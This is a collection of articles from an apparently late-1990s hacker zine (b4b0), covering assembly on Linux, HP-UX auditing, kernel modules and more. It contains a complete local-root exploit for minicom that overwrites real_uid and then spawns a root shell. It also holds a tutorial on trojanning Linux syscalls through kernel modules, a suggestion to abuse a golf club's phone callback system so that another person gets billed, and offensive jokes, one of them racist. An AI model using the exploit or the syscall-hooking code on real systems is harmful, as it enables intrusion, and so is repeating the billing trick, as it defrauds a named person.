// printf("z is %f \n x is %f \n y is %f \n", shape->points[temp].z, shape-
>points[temp].y, shape->points[temp].x);
shape->twodee[temp].x=(((shape->points[temp].x + shape-
>location.x)*viewing_distance)/
(shape->points[temp].z+shape->location.z))+150;
shape->twodee[temp].y=(((shape->points[temp].y+shape-
>location.y)*viewing_distance)/
(shape->points[temp].z+shape->location.z))+150;
}
}
/********************** ROTATION ************************/
void rotate(struct object *shape, float degrees_x, float degrees_y)
{
int temp;
for(temp=shape->numpoints; temp > 0; temp--)
{
shape->points[temp].x=((shape -> points[temp].x*cos(degrees_x)) -
(shape -> points[temp].y*sin(degrees_x)));
shape -> points[temp].y=((shape->points[temp].x*sin(degrees_y)) +
(shape -> points[temp].y*cos(degrees_y)));
// shape -> points[temp].z=((shape->points[temp].z*sin(degrees)) +
// (shape -> points[temp].z*cos(degrees)));
}
}
/************************** SETUP *****************/
void setup(void)
{
viewing_distance=10;
display=XOpenDisplay(NULL);
assert(display);
blackcolor=BlackPixel(display, DefaultScreen(display));
whitecolor=WhitePixel(display, DefaultScreen(display));
window=XCreateSimpleWindow(display,DefaultRootWindow(display), 0, 0, 800,1000,
0, blackcolor, blackcolor);
XSelectInput(display, window, StructureNotifyMask);
XMapWindow(display, window);
graph=XCreateGC(display, window, 0, NULL);
XSetForeground(display, graph, whitecolor);
for(;;) {
XEvent e;
XNextEvent(display, &e);
if (e.type == MapNotify)
break;
}
XEventsQueued(display, QueuedAfterFlush);
XFlush(display);
}
/************************************************************************
***************** END minimalist_3d_engine_example.c ******************
************************************************************************/
OK, this was a simple and confusing tutorial! Wait for b4b0.4 !! By then I
will have finished a REAL TEXTURE MAPPED THREE DEE GRAPHICZ ENGINE IN
XLIB!$@@!@@!!@
have fun
- jsbach
[ asm on de Linux/x86 - chrak ]-x- -x- -x- -x- -x- -x- -x- -x--x- -x-
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
asm on de Linux/x86
prerequisite:
1) you know basic x86 asm, and a bit about protected mode.
2) for this article well be using at&t synthax, simply becuase everyone
will have the assembler already, and its used by gcc
for all the examples here just set up a file like:
int main(void)
{
__asm__("
example code here
");
}
If you dont meet the prerequisites go find the
INTEL 80386 PROGRAMMER'S REFERENCE MANUAL on the web.
Get the "Intel Architecture Software Developer's Manual" volumes 1 - 3 in pdf
format at:
ftp://download.intel.com/design/pentium/manuals/24319001.PDF vol. 1
ftp://download.intel.com/design/pentium/manuals/24319201.pdf vol. 3
To learn the gnu as asembler goto http://www.freebsd.org/info/as-all
and also just play around with gcc's -S option.
we can use all our code inbedded [s1c] into a gcc src file also, by using
the __asm__ keyword. Although this isnt portable to other compilers.
1:syscalls
2:sys_socketcall
3:using lib functions
4:debugging
5:a full example
6:el fin
1:syscalls
bleh.
the syscall numbers can be found in <sys/syscall.h>
most of them behave like their libc wrappers
for example to fork u could do this:
movl $2, %eax # 2 = SYS_fork
int $0x80 # Linux
the syscall used is based on the value of eax at the time the interrupt
occurs, sys_fork does not have any arguments so the other general registers
are ignored. The code
movl $0x4647, (%ebp) # movs GF to the addr in ebp
movl $4, %eax # 4 = SYS_write
movl $1, %ebx # 1 = fileno(stdout)
leal (%ebp), %ecx # loads the address of the 'GF' string
movl $2, %edx # bytes to write
int $0x80
will write "GF" to stdout, Linux takes the values in the general registers
besides eax and uses them as args to the syscall. The order is the same
as the write(2) lib function: write(int fd, const void *buf, size_t count)
, this holds true for most (all?) lib functions.
The offset field of interrupt 0x80's descriptor in the idt points to the
system_call symbol in arch/i386/kernel/entry.S in the Linux src tree.
This code will call the address pointed to by the 4th entry in sys_call_table
(from 0). This is sys_write()'s address. The code for this function is in
fs/read_write.c, It is passed the values that were in ebx, ecx, and edx when
we interrupted. When the syscall returns it will set the registers back to
where they were before it started the only change will be that %eax contains
the return value.
2:sys_socketcall
I've given this its own chapter becuase blah blah blah(i felt like it!)
This works like socketcall(2) libc function. All the other functions like
socket(), accept() and so on are just wrappers to socketcall() in libc.
anyway. lets say I wanted to create a socket. I could do:
sfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
or
unsigned long args[] = { AF_INET, SOCK_STREAM, IPPROTO_IP };
sfd = socketcall(SYS_SOCKET, args);
or
movl $2, -12(%ebp) # 2 = AF_INET
movl $1, -8(%ebp) # 1 = SOCK_STREAM
movl $0, -4(%ebp) # 0 = IPPROTO_IP
movl $102, %eax # 102 = SYS_socketcall
movl $1, %ebx # 1 = SYS_SOCKET
leal -12(%ebp), %ecx # load addr of socket args
int $0x80
the socketcall call args are defined in <linux/net.h>, the args are the same
as the libc functions arguments. Its similar for all other socketcall calls.
Here is a SYS_CONNECT example:
# equiv of a sockaddr struct
movw $2, -20(%ebp) # sockaddr family = AF_INET
movw $5376, -18(%ebp) # sockaddr port = 5376 = htons(21)
movl $0, -16(%ebp) # sockaddr addr = 0
movl $8, -12(%ebp) # assuming 8 is a valid fd
leal -20(%ebp), %eax # load addr of sockaddr struct
movl %eax, -8(%ebp)
movl $16, -4(%ebp) # 16 = sizeof(struct sockaddr)
movl $102, %eax # 102 = SYS_socketcall
movl $3, %ebx # 3 = SYS_CONNECT
leal -12(%ebp), %ecx # load addr of connect args
int $0x80
3:using lib functions
to use a function from libc or whatever just push its args onto the stack,
and call it. For example to print the string "Hello world" we could do:
pushl $MSG # push addr of string onto stack
call puts # call puts
pushl $0 # push 0 onto stack
call exit # call exit
MSG:
.string \"Hello world\" # null terminated string
This prints out the string, and exits with 0.
Multiple arguments are pushed in backwards order, because we have a lifo stack.
i.e. func(1, 2, 3) would be: push 3 push 2 push 1 call func.
4:debugging
ok, so your program does nothing or coredumps
using strace is excellent for seeing whats going on
for example, In the SYS_CONNECT example, if there was an error we would be able
to find it quickly by 'strace a.out' or whatever its name was.
connect(8, {sin_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("0.0.0.0"
)}, 16) = -1 EBADF (Bad file number)
The problem here was that 8 was not a valid fd
The following example will core dump if ran in an application:
hlt
pushl $5
call exit
This is because hlt can not be used in a segment with a CPL higher then 0.
Lets assume we didn't know this and wanted to figure out why our program was
'FUK3d!'. This is condensed a bit:
gdb program
(gdb) run
Program received signal SIGSEGV, Segmentation fault.
0x804841b in main ()
(gdb) x/i 0x804841b
0x804841b <main+3>: hlt
Now we know where the problem is.
5:a full example
/* writes host 0's ftp banner thing to stdout */
char error_msg[] = "err0r\n"; /* we can use global variables */
void main(void)
{
__asm__("
movl $2, -12(%ebp) # 2 = AF_INET
movl $1, -8(%ebp) # 1 = SOCK_STREAM
movl $0, -4(%ebp) # 0 = IPPROTO_IP
movl $102, %eax # 102 = SYS_socketcall
movl $1, %ebx # 1 = SYS_SOCKET
leal -12(%ebp), %ecx # load addr of socket args
int $0x80
cmpl $-1, %eax
jl ERROR
movw $2, -20(%ebp) # sockaddr family = AF_INET
movw $5376, -18(%ebp) # sockaddr port = 5376 = htons(21)
movl $0, -16(%ebp) # sockaddr addr = 0
movl %eax, -12(%ebp) # put sockfd
leal -20(%ebp), %eax # load addr of sockaddr struct
movl %eax, -8(%ebp)
movl $16, -4(%ebp) # 16 = sizeof(struct sockaddr)
movl $102, %eax # 102 = SYS_socketcall
movl $3, %ebx # 3 = SYS_CONNECT
leal -12(%ebp), %ecx # load addr of connect args
int $0x80
cmpl $-1, %eax
jl ERROR
movl $3, %eax # 3 = SYS_read
movl -12(%ebp), %ebx # get sockfd
leal -80(%ebp), %ecx # buffer
movl $80, %edx # 80 = count
int $0x80
cmp $-1, %eax
jl ERROR
movl $4, %eax # 4 = SYS_write
movl $1, %ebx # 1 = fileno(stdout)
int $0x80
cmp $-1, %eax
jl ERROR
movl $0, %ebx # returns 0 on success
EXIT:
movl $1, %eax # 1 = SYS_exit
int $0x80
ERROR:
movl $4, %eax # 4 = SYS_write
movl $1, %ebx # 1 = fileno(stdout)
movl $error_msg, %ecx # load MSG1's addr
movl $6, %edx # 6 = strlen(MSG1)
int $0x80
movl $-1, %ebx # returns -1 on failure
jmp EXIT
");
}
6:el fin
So dat about wraps it up for now ? Basically knowing this is only practical
for writing exploit shellcode or implimenting a library, but your not a
practical person, are you ? However it does give you an idea of how many levels
the system works at. Werd 2 fatima!
[b4b0 misc, w4rnings et cet3ra (ge0rge)] x- -x- -x- -x- -x- -x- -x- -x-
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
b4b0 misc..
-----------
b4b0: with NEW cleansing action!
b4b0: Just do it.
b4b0 - Let the journey begin.
b4b0 - don't leave home without it.
b4b0 - clinically shown to actually *GROW* hair!
b4b0 - 4 out of 5 doctors recommend it! (the 5th one is black)
b4b0 - this box never closes!
b4b0 - doesn't fade colors like other brands do!
Viva la b4b0!
Did someone say b4b0?
Yo quiero b4b0!
b4b0: the histamine blocker.
Get a taste of the b4b0!
b4b0: quick allergy relief.
b4b0: for upset *stomachs*
b4b0, will help you get your 'z's!
b4b0 cookies and creme : smile more!
Like a good neighbor, b4b0 is there..
Just wait till we get our b4b0 on you!
b4b0 warnings / other:
----------------------
- You may need to read b4b0 daily for three months or more to see visible
results. b4b0 will not regain all your eliteness. And if you stop using
this product you will gradually start losing the eliteness you have
gained. There is not sufficient evidence that b4b0 works for rsession at
the physical level. If you have seen results after 12 mones of using b4b0
further treatment is likely to be of benefit.
- Guns don't kill people. b4b0 kills people.
- f.b.s. (fetal b4b0 syndrome) can cause serious birth defects to your
child if you are reading b4b0 anytime during pregnancy. Such birth defects
can range from mild pigeon toe'd children to serious deformities of
organs, limbs, and other physical features inside the body. Please, do not
read b4b0 while pregnant.
- b4b0 if read in large doses can cause liver failure.
- *WARNING* b4b0's contents under extreme pressure *WARNING*
- WARNING! FLAMMABLE LIQUID AND VAPOR. VAPORS AND SPRAY MIST HARMFUL IF
INHALED. HARFUL OR FATAL IF SWALLOWED. MAY CAUSE CENTRAL NERVOUS SYSTEM
EFFECTS SUCH AS DIZZINESS, HEADACHE, NAUSEA. MAY CAUSE NOSE, THROAT, EYE
AND SKIN IRRITATION. CAN BE ABSORBED THROUGH THE SKIN.
- CAUTION: Keep Out Of Eyes! In case of accidental eye contact, DO NOT
RUB EYES. Flush eyes throughly with water. If conditions worsen or
irritation persists, call a physician. If swallowed consult a physician or
poison control center. KEEP OUT OF REACH OF CHILDREN. FOR EXTERNAL USE
ONLY.
- WARNING: Extremely Flammable!
> b4b0's 0fficial song Doggie Tom Overture; Lords Of Acid
> b4b0's magazine Guns and Ammo
> b4b0's official controlled substance Chelsea Clinton
> b4b0's official narcotic morphine
> b4b0's country afghanistan
> b4b0's k-rad clothez b4b0 we4r
> b4b0's suggestion go fuck yourself
> The Official Food Supplier Of b4b0 burger king!
> Stuff that keeps b4b0 going coffee
> Stuff that keeps b4b0 going too Hustler Magazine (tm)
> Official b4b0 place of worship your local synagogue!
[g0lf teleph0ny ju4r3z (Qytpo) ]-x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
######################## GOLF TELEPHONY JUAREZ ###########################
## ##
### Qytpo ###
### ###
###########################
0kay. so i was house sitting for theze 0ld people in thiz el8 retirement
community. and eye was sitting 0n the t01let, taking a sh1t, when i came
across this article for the 0ld g0lfer k1dz in place, in a
pamphlet given to members of the retiremenet community. Up0n reading it i
noticed some pretty silly things.
the art1cle bel0w iz a replica of the exact thing i read. l00k
specifically at the portion labeled "7"
begin 644 0day.g0lf.juarez
----- MACCS Tee Time System - Procedure, Rules, and Regulations -----
The 1997-98 golf season is upon us. Our computer system for taking tee
times is called MACCS, which stands for Message and Call Back Computer
System. The times for call in and the phone numbers for our two phase III
golf courses are:
OAKWOOD/IRONWOOD 7:00 to 7:10AM 602-895-1805
Due to heavy phone line usage during the hours of 6:AM to 9:00AM, any
changes or cancellations in teetimes should be made only starting at 9:30
AM. 48 hours in advance by phone or in person, at each pro shop. At 9:30
AM daily, each Pro Shop will sign up "Stand By's", alternating between
people in person and the telephone.
The MACCS system is a fair and efficient way to take tee times and also
keeps the personal touch of talking with a pro shop staff person. The
system works as follows:
1: Between 4:45 PM, and 5:3 AM, golfers can call 602-895-1805 for
tee times at oakwood or ironwood. MACCS will give the offical time to the
second.
2: Prompty at 7:00 AM, golfers can call 602-895-1805 for tee times
at Oakwood or Ironwood. MACCS wll accept 150 calls during the
Oakwood/Ironwood call in period.
3: MACCS will answer your call by saying "Please enter last four
digits of your phone number and end with the star key." (i.e., 6566*).
MACCS will then tell you what number call you are, say "Good Bye" and hang
up. Golfers should punch in their phone number without delay. It is not
the order the call was recieved, but the order in which valid numbers are
entered that counts. The comptuter will then automatically call you back,
based on your caller number. You will make your tee time then by talking
with a pro shop staff person.
4: MACCS will automatically accept and verify the sequence of 150
calls in an estimated 10 minute period for Oakwood and Ironwood. After
150 calls have been taken in, MACCS will tell golfers no more calls are
being accepted at this time. *please do not call or re-dial the tee time
number after that 10 minute period has passed. MACCS must have open phone
lines in order to call the golfers back.* If your call did not get
answered by MACCS during this 10 minute period, please call the next golf
course at the appropriate time.
5: MACCS will keep trying to call you back, up to 3 minutes, when
a busy signal is recieved.
6: Pulse phones are not acceptable to this MACCS system. Phones
that are switchable must have the switch set to TONE. If the caller makes
a mistake punching in the phone number, just press the pound(#) key and
MACCS will start the procedure over again. You may substitute punching
"0000" for a non-functioning star(*) key and also punching "9999" for a
non-functioning pound(#) key.
7: MACCS will call you back if you are outside the 895 phone
prefix area. Just punch in the correct prefix (i.e., 802-5010). If you
are in an area that requires a toll call, just punch in (1-602) before
your number (i.e., 1-602-248-6134). Finally, if you are in an area with a
different area code than 602, just punch in all 11 digits on your phone
number (i.e., 1-414-728-6001). Long distance calls will be charged back to
the caller by the pro shop.
Please feel free to ask your Pro Shop staff for assistance.
EOF
-------------------------------------------------------------------------------
0kay so as you can see, th0u could have a bit of fun with this. enter in
s0lo'z number 0ver and over and have him get billed perhapz. wh0 knowz.
the possiblities are endl3ss. have fun kidz.
minicom versions less than 1.81.1 have many buffer overflow bugs
the one we will be exploiting is
case 't': /* Terminal type */
---> strcpy(termtype, optarg);
#ifdef __linux__
/* Bug in older libc's (< 4.5.26 I think) */
if ((s = getenv("TERMCAP")) != NULL && *s != '/')
unsetenv("TERMCAP");
#endif
minicom ships suid root with slackware 3.5 so we will work from there.
now lets see. termtype is static, so we won't be able to do the
traditional buffer overflow of overwriting the return address.
but could there be useful information in memory past
termtype? we take a look at minicom.h and find
EXTERN int real_uid; /* Real uid */
EXTERN int real_gid; /* Real gid */
EXTERN int eff_uid; /* Effective uid */
EXTERN int eff_gid; /* Effective gid */
wow. the one we want is real_uid. lets see just how far it is past
termtype. we insert this in minicom.c:
printf ("real_uid is at: %x\n"
"termtype is at: %x\n", &real_uid,termtype);
output:
real_uid is at: 80664b4
termtype is at: 8066480
so real_uid is just 52 bytes past the start of termtype!
we can take advantage of the fact that getopt() will keep reading the
same parameter over and over (in this case, "-t"). so we feed it 4
strings, the first one ending at the last memory location of real_uid
(termtype+55). this will set the last byte of real_uid to 0.
we do the same for (termtype+54),(termtype+53),and (termtype+52).
we also give minicom a "-t vt100" parameter so it won't exit with
`no termcap entry'
-- start new.minicom.c --
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define OFFSET 52
/* if you figure this out, you could try defining it */
//#define UTTY "/dev/ttyp0"
char * makestring (int ch, int len)
{
static char b[500];
int i;
for (i=0 ; i<len ; i++)
{
b[i] = ch;
}
b[i] = 0;
return b;
}
int main (int argc, char **argv)
{
char bleh[4][60];
strcpy (bleh[0],makestring(255,OFFSET+3));
strcpy (bleh[1],makestring(255,OFFSET+2));
strcpy (bleh[2],makestring(255,OFFSET+1));
strcpy (bleh[3],makestring(255,OFFSET));
#ifdef UTTY
execl ("/usr/bin/minicom","minicom",
"-t",bleh[0],"-t",bleh[1],
"-t",bleh[2],"-t",bleh[3],
"-t","vt100","-s",
"-p",UTTY,NULL);
#else
execl ("/usr/bin/minicom","minicom",
"-t",bleh[0],"-t",bleh[1],
"-t",bleh[2],"-t",bleh[3],
"-t","vt100",
"-s",NULL);
#endif
return 0;
}
-- end new.minicom.c --
so real_uid becomes 0x00000000 (root)
we can't just send minicom a SIGSTP, it will restore our old uid.
we need to get minicom to *exec* a shell.
execute the above code and you'll discover minicom's window system is
unreadable. start a normal version of minicom in a different console
we look at the menu and see: `Filenames and paths'
A - Download directory : /tmp
B - Upload directory :
C - Script directory :
D - Script program : runscript
E - Kermit program : /usr/bin/kermit
Change which setting?
looks like we could just change `E- Kermit program' to `/bin/bash'
so we do.
now we exit configuration and the terminal starts up.
we start kermit
CTRL+A+K = bash#
voila.
[a high level sockets API - [presonic]] x- -x- -x- -x- -x- -x- -x- -x-
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
[/home/presonic/projects/tcpip] $ cat README
High Level Unix Socket Functions
This is the first release, they have only been *tested* on linux.
These functions can be used to learn how to use socket functions,
or to avoid learning them. That part, has been left to you.
Both subscan and http_ver are examples on how to use the socket
functions. subscan uses advanced non blocking i/o and select()
stuff, so it may be hard to follow.
See tcpip.c for more details.
Files:
README you're fat.
Makefile type 'make' and see.
tcpip.c *the* socket functions.
subscan.c a scanner that sweeps a subnet for a given port.
(this uses non blocking i/o)
http_ver.c this query's a web server and try's to find the server
version.
[/home/presonic/projects/tcpip] $ whatis b4b0
b4b0: nothing appropriate
[/home/presonic/projects/tcpip] $
EOF
[HP-UX security pt 2 - [tip]] x -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
HP-UX: A Security Overview, Part Two revision01 10sep98
by: tip (tip@b4b0.org)
---------------------------------------------------------------------------
Table of Contents:
1) Introduction 5) The Trusted System: DB Lib Routines
2) The Trusted System: Auditing 6) Other Info Pt 1
3) The Trusted System: ACLs 7) To Be Continued
---------------------------------------------------------------------------
1) Introduction
a) This text is designed to complement to general Unix knowledge. All Unix
OS's are different in their own right. This text will delve into HP-UX-
specific areas. This is not a Unix tutorial, rather a supplement to
fundamental Unix knowledge.
b) This text will cover HP-UX version 10.x primarily. Specifically, 10.10
and 10.20 will be in mind. 11.0 has been released and I haven't gotten
to checking it out yet. 9.x is old, and no longer supported by HP. Thus,
the most logical choice (and most popular version of HP-UX) is 10.x.
c) I'm not perfect; please notify me of any errors in the document. Also,
if you see anything you want added to this file, feel free to send them
to me.
---------------------------------------------------------------------------
2) The Trusted System: Auditing
Auditing is a feature only available on Trusted Systems. It provides a
means to record events and analyze security. Monitoring is done from the
command line or through SAM (Systems Administration Manager). Most
commonly, SAM is used to do auditing.
Auditing commands
These are pretty self-explanatory. Check man pages for detailed info.
audsys(1m) : start/halt auditing and set/display audit file information
audusr(1m) : select user to audit
audevent(1m) : change/display event/syscall status
audomon(1m) : set audit file monitoring and size parameters
audisp(1m) : display audit record
What system calls does auditing log?
Basically system calls are grouped into event types. Auditing is
selective by this event type, not by particular system calls. One thing
to note: the event types of admin, login, and moddac are logged by
default. See below for which system calls fit under which event type.
These are selectable under SAM.
event type: system calls:
----------- -------------
admin audevent(1m), audisp(1m), audswitch(2), audsys(1m),
audusr(1m), chfn(1), chsh(1), init(1m), passwd(1),
privgrp(2), pwck(1m), reboot(2), sam(1m), setaudid(2),
setaudproc(2), setdomainname(2), setevent(2),
sethostid(2), settimeofday(2), swapon(2)
close close(2)
create creat(2), msgget(2), mknod(2), mkdir(2), pipe(2),
semget(2), shmat(2), shmget(2)
delete msgctl(2), rmdir(2), semctl(2)
ipcclose shutdown(2)
ipccreat bind(2), socket(2)
ipcdgram udp(7)
ipcopen accept(2), connect(2)
login init(1m), login(1)
modaccess chdir(2), chroot(2), link(2), newgrp(1), rename(2),
setgid(2), setgroups(2), setresuid(2), setuid(2),
shmctl(2), shmdt(2), unlink(2)
maddoc chmod(2), chown(2), fchmod(2), fchown(2), fsetacl(2),
setacl(2), umask(2)
open execv(2), execve(2), ftruncate(2), lpsched(1m), open(2),
ptrace(2), truncate(2)
process exit(2), fork(2), kill(2), vfork(2)
removable smount(2), umount(2), vfsmount(2)
uevent1 reserved for custom self-auditing programs
uevent2 reserved for custom self-auditing programs
So what is a self-auditing program? Basically, the amount of data that
is audited can become cumbersome; thus self-auditing programs log only one
entry decribing their process, after suspending the auditing of their
actions. The intent is to limit and thus, optimize the audit data that is
logged.
Standard processes that are self-audit capable:
audevent(1m), audisp(1m), audsys(1m), audusr(1m), chfn(1), chsh(1),
init(1m), login(1), lpsched(1m), newgrp(1), passwd(1), pwck(1m).
Where are audit logs located?
/.secure/etc/audfile1 (primary log) switch size = 5 megs (AFS)
/.secure/etc/audfile2 (auxiliary log) switch size = 1 meg (AFS)
Warnings are sent when the log file reaches 90%.
The Audit File Switch (AFS, as seen above), is basically a defined
limit for the primary log file. The File Space Switch (FFS), is the
defined limit for the filesystem for which the audit logs reside on.
When the AFS limit is reached for the primary log, the audit logs are
stopped, and then started on the auxiliary log. If no auxiliary log
exists, it keeps on continuing to log on the primary. Now, if both the
AFS and FFS limits are reached, it _still_ continues to log. Obviously
this will be logged that the limit has been reached. But when does it
stop? Basically a system parameter in the kernel, called min_free, stops
all audit log activity if that point is reached.
Thus, in a nutshell...
-----------------> as size of audit logs increase -------------------->
primary AFS reached, give warning, switch to:
auxiliary log -> when auxiliary AFS is is reached,
give warning, and:
watch FFS -> when that limit is reached,
give warning, and:
watch min_free parameter -> when that
limit is reached, halt all
audit logs, until they are
removed
---------------------------------------------------------------------------
3) The Trusted System: ACLs
Access control lists are are basically an "extended" set of permissions
for files and directories. Two things to note: 1) ACLs are slowly being
phased out (11.0 supports them, but this might be the last version that
supports ACLs), and 2) ACLs cannot be used on VxFS (Journal Filesystem,
also known as JFS). Two commands are integral to ACLs: lsacl and chacl.
Basically think of lsacl as the extended equivalent of ls, while chacl
is the extended equivalent of chmod and chown. How are ACLs "extended"?
While standard Unix has three sets of permissions, ie:
-rwxr--r-- 1 oracle dba 523 Nov 22 1996 run1.sh
ACLs enables thirteen additional sets of permissions (ACL entries) to
be designated, which are stored in the access control list of the file.
Suppose you wanted everyone BUT johndoe to read a file. In standard Unix,
you'd have to create a group, put everyone in it except johndoe, then
modify the permissions on the file accordingly (basically a pain in the
ass). With ACLs, simply type: chacl 'johndoe.users=-rwx' <filename>
Looking at that file with 'lsacl <filename>' you see:
(johndoe.users,---)(root.%,rw-)(%.sys,r--)(%.%,r--) filename
Note that modifiers in chacl are + (add permission), - (remove permis-
sion), etc.
How would you know if a file or directory had additional permissions?
Do an 'ls -l' or 'll' on the file:
-rwxr--r-+ 1 oracle dba 523 Nov 22 1996 run1.sh
Note the "+". This indicates there are additional permissions to be
seen with lsacl.
ACLs are useful to know within HP-UX, as standard file permissions,
listings in /etc/group, etc. can be inconclusive in determining the owner-
ship of a file or directory.
Other commands (primarily system calls; see man pages for more info):
getaccess (command): list access rights to a file.
chmod -A (command): the -A option preserves ACLs associated with the file.
otherwise, they are deleted.
cpset (command): install object files in binary directories. does not set
a file's optional ACL entries.
find -acl (command): the -acl option supports ACLs.
getacl/fgetacl (syscall): get ACL information.
setacl/fsetacl (syscall): set ACL information.
cpacl/fcpacl (syscall): copy ACL/mode bits from one file to another.
setaclentry/fsetaclentry (syscall): set/modify/delete one ACL entry in
a file.
chownacl (syscall): change ACL owner/group info in a file.
acltostr (syscall): convert ACL structure to string form.
strtoacl (syscall): convert string form to ACL structure.
strtoaclpatt (syscall): parse/convert ACL pattern strings to arrays.
---------------------------------------------------------------------------
4) The Trusted System: DB Lib Routines
Basically, these routines are used to manipulate information on both the
password file (/etc/passwd), and the trusted system database (/tcb/files/
auth).
getdvagent(3): get device entry from /tcb/files/auth/devassign
getprdfent(3): get system default entry from /tcb/files/auth/system/default
getprtent(3) : get term control entry from /tcb/files/ttys
getprpwent(3): get /tcb/files/auth password entries
getpwent(3c) : get /etc/passwd entries
getspwent(3x): get /tcb/files/auth password entries for standard, non-hp
format
putprpwnam(3): put password entry in /tcb/files/auth
putpwent(3c) : put password entry in /etc/passwd
putspwent(3x): put password entry in standard, non-hp format
---------------------------------------------------------------------------
5) Other Info Pt 1
nettl: HP-UX's network sniffer
The question arises all too often about the availability of a sniffer for
HP-UX. A solution that isn't realized by many is the fact that HP-UX comes
with one. Here is the basic syntax for nettl. Check the man page for more
detailed information on what you need.
Start the logging process, logging all (-e, short for -entity) protocol
layers/software modules, outputting to /tmp/b4b0!! (pduin is the inbound
protocol data unit, and obviously, pduout is the outbound protocol data
unit):
nettl -traceon pduin pduout -e all -f /tmp/b4b0
Stop the logging for all (-e):
nettl -traceoff -e all
Format the log file to make it readable:
netfmt -f /tmp/b4b0.TRC0 > /tmp/b4b0.txt
---------------------------------------------------------------------------
6) To Be Continued
Welps, that's it for now, kinda short. However, Part 3 will delve into
NFS diskless clusters, network services, linklevel access, and other fun
stuff.
---------------------------------------------------------------------------
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[writing lkm's - [segv]] x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
Introduction
------------->
In the past various people have released articles or trojan code
for the purpose of trojanning Linux kernel's, due to the fact that it is
pretty much child's play. This is a simple article which will discuss
them.. and write some simple ones.
When you call a syscall the 'magic number' (found in /usr/include/
sys/syscall.h) is pushed into a register along with arguments to the syscall
and Linux's maskable interrupt is executed, jumping to kernel mode.
Linux's maskable interrupt jumps to kernel mode and gives control to a
kernel function called _system_call(), which checks the value of one the
general purpose registers (eax) and compares that value to the global syscall
table. The global syscall table tells where u can find the syscall in memory.
simple example of calling setuid(0); Note: unless your root the call to setuid
will fail.. if you are.. the execution of this program will run as root doing
nothing. (just an example)
root@ux~# grep "SYS_setuid" /usr/include/sys/syscall.h
#define SYS_setuid 23
root@ux~# cat > setuid.c
void main()
{
__asm__("
movl $23, %eax # magic number of syscall into eax
movl $0, %ebx # arugment u are passing to setuid()
int $0x80 # jump to kernel mode.
");
}
^D
root@ux~#
Pretty simple, eh? ;)
Now lets write our first loadable kernel module. (which can be loaded into the
kernel on an as need basis). When you first load the module into the kernel
init_module() is exec'ed, when you unload it, cleanup_module() is exec'ed.
Note: printk() is a kernel function and can't be called from the userland.
You should take a look at the man pages for rmmod(1), lsmod(1), and insmod(1).
root@ux~# cat > lkm1.c
#define MODULE
#include <linux/module.h>
int init_module(void)
{
printk("B4B0 0WNZ U.\n");
printk("Module loaded.\n\n");
return(0);
}
void cleanup_module(void)
{
printk("Module unloaded\n");
}
^D
root@ux~# cc -c lkm1.c
root@ux~# insmod lkm1.o
B4B0 0WNZ U.
Module loaded.
root@ux~# rmmod lkm1.o
Module unloaded
root@ux~#
Ok.. once _system_call() is called and finds out where the syscall we wanna
exec is in memory, the actual syscall gets executed.. once that is done
control is givin back to _system_call() which then call's
_ret_from_sys_call() which jumps back to userland mode.
Trojanning syscall's.
--------------------->
Just to give you an idea. You can modify the memory address
sys_call_table[SYS_<whatevercallyouwant>] points to and have it exec your
code. I wrote a simple wrapper to write(2), which from the trojanned function
calls the real function, just an other example..
***IMPORTANT***
I tested this code on 2.0.33, worked fine.. Since then I have
upgraded to 2.0.34 and this crashed my Linsux machine. (I'm considering
downgrading ;) Oh well.. USE AT YOUR OWN RISK. I wrote this code a while
ago, heh.
Thanks
------->
Plaguez great article in Phrack.. which pretty much explained everything.
"Writing Device Drivers for Linux". Some book, forgot the name of the author.
/*
* gcc -O3 -c stupid-example.c; /sbin/insmod stupid-example.o
* -segv <segv@b4b0.org>
*/
#define MODULE
#define __KERNEL__
#include <linux/config.h>
#ifdef MODULE
#include <linux/module.h>
#include <linux/version.h>
#else
#define MOD_INC_USE_COUNT
#define MOD_DEC_USE_COUNT
#endif
#include <linux/types.h>
#include <linux/fs.h>
#include <linux/mm.h>
#include <linux/errno.h>
#include <asm/segment.h>
#include <sys/syscall.h>
#include <linux/dirent.h>
#include <asm/unistd.h>
#include <sys/types.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <ctype.h>
int errno;
extern void *sys_call_table[];
// ssize_t write(int fd, const void *buf, size_t count);
ssize_t (*wwrite) (int fd, const void *buf, size_t count); // function pointer
ssize_t hihi(int fd, const void *buf, size_t count) // our c0de.
{
ssize_t yo;
yo=wwrite(fd,buf,count); // wwrite is the real write(2) call
return(yo);
}
int init_module(void)
{
wwrite=sys_call_table[SYS_write]; /* have our function pointer point
